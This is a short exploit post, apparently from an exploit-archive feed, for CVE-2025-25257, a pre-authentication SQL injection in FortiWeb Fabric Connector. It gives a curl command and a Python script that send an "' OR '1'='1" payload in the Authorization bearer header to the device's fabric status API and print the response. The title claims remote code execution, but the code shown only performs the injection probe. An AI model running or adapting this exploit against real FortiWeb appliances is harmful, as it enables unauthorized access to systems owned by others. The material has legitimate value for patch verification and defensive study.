
























# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL
Injection to Remote Code Execution
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2025-25257
Overview
CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in
Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.
This flaw allows attackers to inject malicious SQL commands into the
vulnerable API endpoint, potentially leading to Remote Code Execution (RCE).
PoC
curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
https://<fortiweb-ip>/api/fabric/device/status
PoC Python
import requests
def test_sqli(base_url):
url = f"{base_url}/api/fabric/device/status"
headers = {
"Authorization": "Bearer aaa' OR '1'='1"
}
try:
response = requests.get(url, headers=headers, verify=False,
timeout=10)
print(f"Status code: {response.status_code}")
print("Response body:")
print(response.text)
except Exception as e:
print(f"Error: {e}")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="PoC SQLi By Ex3ptionaL
CVE-2025-25257 FortiWeb")
parser.add_argument("base_url", help="Base URL of FortiWeb (ex:
https://10.0.0.5)")
args = parser.parse_args()
test_sqli(args.base_url)
# python3 src/poc.py https://10.0.0.5
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。